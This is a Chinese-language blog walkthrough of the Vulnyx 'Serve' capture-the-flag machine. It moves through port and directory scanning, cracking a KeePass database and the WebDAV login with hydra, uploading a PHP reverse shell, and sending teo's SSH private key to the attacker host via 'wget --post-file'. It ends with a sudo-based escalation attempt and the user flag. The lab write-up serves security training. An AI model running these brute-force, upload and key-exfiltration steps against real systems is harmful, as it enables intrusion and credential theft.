Vlx_Serve

难度：Easy

思维导图：

一、信息收集

1、主机探测

┌──(root㉿kali)-[~/miaosec]
└─# nmap -sn 192.168.2.0/24              
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-27 10:31 +0800
Nmap scan report for 192.168.2.1
Host is up (0.00036s latency).
MAC Address: 0A:00:27:00:00:06 (Unknown)
Nmap scan report for 192.168.2.2
Host is up (0.00029s latency).
MAC Address: 08:00:27:A1:CD:6A (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.10
Host is up (0.00046s latency).
MAC Address: 08:00:27:2C:E3:4A (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.4
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 7.55 seconds

靶机IP：192.168.2.10

2、端口扫描

1.全端口扫描

┌──(root㉿kali)-[~/miaosec]
└─# nmap --min-rate 10000 -p- 192.168.2.10                   
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-27 10:31 +0800
Nmap scan report for 192.168.2.10
Host is up (0.00049s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:2C:E3:4A (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 4.68 seconds

开放端口：22、80

2.详细信息扫描

┌──(root㉿kali)-[~/miaosec]
└─# nmap --min-rate 10000 -sT -sC -sV -O -p22,80 192.168.2.10
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-27 10:32 +0800
Nmap scan report for 192.168.2.10
Host is up (0.0012s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 9a:0c:75:5a:bb:bb:06:a2:9a:7d:be:91:ca:45:45:e4 (RSA)
|   256 07:7d:e7:0f:0b:5e:5a:90:e9:33:72:68:49:3b:f5:8c (ECDSA)
|_  256 6c:15:32:a7:42:e7:9f:da:63:66:7d:3a:be:fb:bf:14 (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:2C:E3:4A (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.75 seconds

3.udp扫描

┌──(root㉿kali)-[~/miaosec]
└─# nmap -sU --top-ports 100 192.168.2.10                    
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-27 10:32 +0800
Nmap scan report for 192.168.2.10
Host is up (0.00060s latency).
All 100 scanned ports on 192.168.2.10 are in ignored states.
Not shown: 59 closed udp ports (port-unreach), 41 open|filtered udp ports (no-response)
MAC Address: 08:00:27:2C:E3:4A (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 60.29 seconds

二、WEB渗透

1、80端口

访问80端口，是Apache的默认页面

2、目录扫描

┌──(root㉿kali)-[~/miaosec]
└─# gobuster dir -u http://192.168.2.10 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,js,txt,bak

index.html           (Status: 200) [Size: 10701]
javascript           (Status: 301) [Size: 317] [--> http://192.168.2.10/javascript/]
notes.txt            (Status: 200) [Size: 173]
secrets              (Status: 301) [Size: 314] [--> http://192.168.2.10/secrets/]
webdav               (Status: 401) [Size: 459]

找到目录：/notes.txt、/secrets、/webdav

查看/notes.txt

┌──(root㉿kali)-[~/miaosec]
└─# curl http://192.168.2.10/notes.txt
Hi teo,

the database with your credentials to access the resource are in the secret directory

(Don't forget to change X to your employee number)

regards

IT department

提示我们用户teo的数据库文件在secret目录下面，同时需要将X修改成数字

对/secrets目录进行递归扫描，由于是数据库文件，因此扫描的时候只需要扫描数据库文件后缀的即可，列如：.sql,.db,.sqlitb,.kbdx

┌──(root㉿kali)-[~/miaosec]
└─# gobuster dir -u http://192.168.2.10/secrets/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x sql,sqlite,db,kdbx         

db.kdbx              (Status: 200) [Size: 2078]

找到数据库文件db.kdbx

3、kdbx文件

.kdbx 文件是 KeePass 密码管理器专用的加密数据库文件，因此该文件是经过加密的，需要进行破解，使用john进行爆破

┌──(root㉿kali)-[~/miaosec]
└─# keepass2john db.kdbx > tmp

┌──(root㉿kali)-[~/miaosec]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt tmp    
Using default input encoding: UTF-8
Loaded 1 password hash (KeePass [SHA256 AES 32/64])
Cost 1 (iteration count) is 60000 for all loaded hashes
Cost 2 (version) is 2 for all loaded hashes
Cost 3 (algorithm [0=AES 1=TwoFish 2=ChaCha]) is 0 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
dreams           (db)     
1g 0:00:00:03 DONE (2026-03-27 11:33) 0.2762g/s 185.6p/s 185.6c/s 185.6C/s sunshine1..kelly
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

找到db.kdbx的密码是dreams

直接使用在线工具打开成功获取到账号和和密码：admin:w3bd4vXXX

根据提示信息，需要将XXX修改为数字

1 2	`┌──(root㉿kali)-[/tmp] └─# seq -f "w3bd4v%03g" 0 999 > pass.txt`

4、HTTP-Bruf

访问webdav是需要进行登录的，根据获取到的信息使用hydra进行爆破

┌──(root㉿kali)-[/tmp]
└─# hydra -t 4 -l admin -P pass.txt http-get://192.168.2.10/webdav                   
Hydra v9.6 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2026-03-27 15:17:09
[DATA] max 4 tasks per 1 server, overall 4 tasks, 1000 login tries (l:1/p:1000), ~250 tries per task
[DATA] attacking http-get://192.168.2.10:80/webdav
[80][http-get] host: 192.168.2.10   login: admin   password: w3bd4v513
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2026-03-27 15:17:24

成功获取到密码：w3bd4v513

5、Webdav

使用凭证成功进行登录但是登录后无任何的内容

WebDAV是基于 HTTP 协议的高级文件管理器，标准的 HTTP 主要用于“看”网页（下载），而 WebDAV 则允许你像操作本地硬盘一样，对远程服务器上的文件进行读、写、移动、复制和锁定

因此可以上传文件到服务器，使用curl进行上传

┌──(root㉿kali)-[/tmp]
└─# curl --digest -u admin:w3bd4v513 -T rev.php http://192.168.2.10/webdav/rev.php
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>201 Created</title>
</head><body>
<h1>Created</h1>
<p>Resource /webdav/rev.php has been created.</p>
<hr />
<address>Apache/2.4.38 (Debian) Server at 192.168.2.10 Port 80</address>
</body></html>

成功将文件上传到服务器

三、获取shell

kali开启监听后，访问rev.php，成功获取到shell

┌──(root㉿kali)-[~]
└─# nc -lvnp 4444 
listening on [any] 4444 ...
connect to [192.168.2.4] from (UNKNOWN) [192.168.2.10] 44496
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

稳定shell

/usr/bin/script -qc /bin/bash /dev/null
# 按下 Ctrl+Z 将其挂起
stty raw -echo; fg
# 按下回车
reset xterm
export TERM=xterm
export SHELL=/bin/bash
stty rows 24 columns 80

四、权限提升

1、获取teo权限

查看sudo -l

Matching Defaults entries for www-data on Serve:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on Serve:
    (teo) NOPASSWD: /usr/bin/wget

使用GTFOBins的方法，无法进行利用

www-data@serve:/var/www/webdav$ echo -e '#!/bin/sh\n/bin/sh 1>&0' > shell
www-data@serve:/var/www/webdav$ chmod +x shell
www-data@serve:/var/www/webdav$ sudo -u teo /usr/bin/wget --use-askpass=shell 0                    
Error spawning shell: 2

使用upload方法，将id_rsa上传到本地

1	`sudo -u teo /usr/bin/wget --post-file=/home/teo/.ssh/id_rsa 192.168.2.4 4444`

成功获取到id_rsa

使用RASCrack进行破解

┌──(root㉿kali)-[~/Tool]
└─# ./RSAcrack -k /tmp/id_rsa -w techyou.txt

 ╭━━━┳━━━┳━━━╮          ╭╮  
 ┃╭━╮┃╭━╮┃╭━╮┃          ┃┃  
 ┃╰━╯┃╰━━┫┃ ┃┣━━┳━┳━━┳━━┫┃╭╮
 ┃╭╮╭┻━━╮┃╰━╯┃╭━┫╭┫╭╮┃╭━┫╰╯╯
 ┃┃┃╰┫╰━╯┃╭━╮┃╰━┫┃┃╭╮┃╰━┫╭╮╮
 ╰╯╰━┻━━━┻╯ ╰┻━━┻╯╰╯╰┻━━┻╯╰╯
─────────────────────────────
 code: d4t4s3c   ver: v1.0.0
─────────────────────────────
[i] Cracking | /tmp/id_rsa
[i] Wordlist | techyou.txt
[*] Status   | 2005/20000/10%/private
[+] Password | private
─────────────────────────────

成功获取到id_rsa的密码:private

成功获取到权限

┌──(root㉿kali)-[~/Tool]
└─# ssh teo@192.168.2.10 -i /tmp/id_rsa 
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
Enter passphrase for key '/tmp/id_rsa': 
Linux serve 4.19.0-18-amd64 #1 SMP Debian 4.19.208-1 (2021-09-29) x86_64
-bash: warning: setlocale: LC_ALL: cannot change locale (zh_CN.UTF-8)
teo@serve:~$ id
uid=1000(teo) gid=1000(teo) groups=1000(teo)

2、获取root权限

查看sudo -l

teo@serve:~$ sudo -l
Matching Defaults entries for teo on Serve:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User teo may run the following commands on Serve:
    (root) NOPASSWD: /usr/local/bin/bro

查看使用方法

teo@serve:~$ sudo /usr/local/bin/bro help
...
  NAME:

    bro

  DESCRIPTION:

    Highly readable supplement to man pages.
    
    Shows simple, concise examples for commands.
...

功能与man类似

直接执行下面的命令即可提权到root权限，但是不知道为什么执行失败，提示curl不在数据库里面

1 2	`sudo /usr/local/bin/bro curl !/bin/bash`

五、查看FLAG

1 2	`teo@serve:~$ cat user.txt 28bf16070abffab749a16bd11f635474`

Vulnyx

#Hydra #Kdbx #Webdav #Sudo_wget #Sudo_Man

Vlx_Serve

http://miao-sec.github.io/Vulnyx/Vlx-Serve/

作者

Miao

发布于

2026年3月27日

许可协议

BY-MIAO

Hvm_Flute 上一篇

Vlx_Hat 下一篇